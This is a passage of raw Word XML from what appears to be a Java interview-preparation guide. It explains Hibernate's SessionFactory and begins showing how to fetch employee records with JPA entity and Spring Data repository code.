          <w:numId w:val="199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SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically instantiated once during application startup and used throughout the lifecycle of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF64DEA" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="199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t is designed to be thread-safe and should be shared by multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3617F12F" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="199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The </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SessionFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be created once per application and closed when the application terminates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8C767C" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199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aching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAA47CA" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="199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The SessionFactory holds the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first-level cache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (session-level cache) and can be configured to work with </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>second-level cache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for more efficient data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5190FAEE" w14:textId="77777777" w:rsidR="00E90CAC"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BEAA959">
          <v:rect id="_x0000_i2456" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F7618A" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC"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Creating and Using SessionFactory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A65C63F" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199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onfiguration and Building SessionFactory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7333EE" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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Load Hibernate configuration file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079C1186" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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onfiguration configuration = new Configuration();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0958EFEA" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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onfiguration.configure("hibernate.cfg.xml");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F89A42" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63429CEF" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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Create SessionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8B5731" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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Factory sessionFactory = configuration.buildSessionFactory();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359CA886" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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Opening a Session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F9FF96" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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Open a new session from SessionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CEEE56" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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 session = sessionFactory.openSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A5913" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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Performing Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4757DCE2" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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ransaction transaction = session.beginTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C19FAC" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F174D97" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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Perform operations (e.g., save an entity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C089E54" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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save(myEntity);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AEDBC0" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C31297E" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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Commit transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1511B153" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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lastRenderedPageBreak/>
        <w:t>transaction.commit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CC7BDE" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199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losing the SessionFactory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B8CEC3" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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After the application completes its operations, you should close the SessionFactory to release resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E0E3E3" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CA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Factory.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B933529" w14:textId="77777777" w:rsidR="00E90CAC"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46FA7D3">
          <v:rect id="_x0000_i2457" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B3A7D" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC"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Why Use SessionFactory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AFAA05" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1A6F23" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="199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Factory is an expensive object to create, so it's designed to be created once and used across the application to avoid unnecessary object creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20266C15" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199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onnection Pooling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D1759" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="199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It manages the connection to the database and uses </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>connection pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to improve performance by reusing database connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A45BA99" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199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aching Support:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601476CB" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="199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It supports </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>second-level caching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reusing objects in the persistence context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E234A" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199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Transaction Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3C83AE" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="199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It plays an essential role in Hibernate's </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transaction management</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, making sure that all operations are performed within a transactional context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B949415" w14:textId="77777777" w:rsidR="00E90CAC"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A864A73">
          <v:rect id="_x0000_i2458" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E01DCCB" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5880388D" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1999"/>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SessionFactory is a central component in Hibernate that manages the creation of </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instances and controls configuration, caching, and transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A066D23" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1999"/>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It is designed to be </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and should be instantiated once for the application, ideally at the startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7395B17A" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1999"/>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t serves as the bridge between your Java application and the database, facilitating the management of persistent objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C99E739" w14:textId="791F4817" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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AF2A134">
          <v:rect id="_x0000_i2459" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29239D0D" w14:textId="2669248C" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA3417">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="555" w:name="_Toc196308035"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">If I want to retrieve a few entries from an </w:t>
      </w:r>
      <w:r w:rsidR="00AC5794" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table, how to retrieve employee details through JPA</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="555"/>
    </w:p>
    <w:p w14:paraId="511C8123" w14:textId="56D6E434" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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To retrieve employee details from an employee table using </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92F6FB" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992"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1. Define the Entity Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A19CECE"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You need an entity class that represents the Employee table. This class will be annotated with JPA annotations such as @Entity, @Table, and @Id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F8395"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mport javax.persistence.Entity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307E7A9"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mport javax.persistence.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514F1409"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mport javax.persistence.Table;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C08EB6" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="332FB61B"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ntity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486A096B"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able(name = "employee")  // Replace "employee" with your actual table name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F81F05"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ublic class Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CAD1CB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF1D74"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C79DAA2"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Long id;   // Primary key field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C55D7B" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A00F5A"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E79B719"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String department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E723E42"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double salary;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCB2D57" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50972165"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Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E901C6"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F5D9DB" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992"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2. Create a Repository Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B360A2"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JPA provides a way to interact with the database via a repository. You can extend JpaRepository or CrudRepository from </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform CRUD operations on the Employee entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638ED18F"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mport org.springframework.data.jpa.repository.JpaRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790A4951" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AAB979F"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ublic interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E47784"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Custom query methods can be defined here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC9EB1B"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    // For example, retrieving employees by department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D30B8"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ist&lt;Employee&gt; findByDepartment(String department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1352C861"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DDFA4B" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992"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3. Use the Repository in a Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D7ECE9"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n your service class, you can use the EmployeeRepository to retrieve the employee data from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA85C12"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mport org.springframework.beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE0E593"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mport org.springframework.stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D3F35E"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mport java.util.List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322C5B7B" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
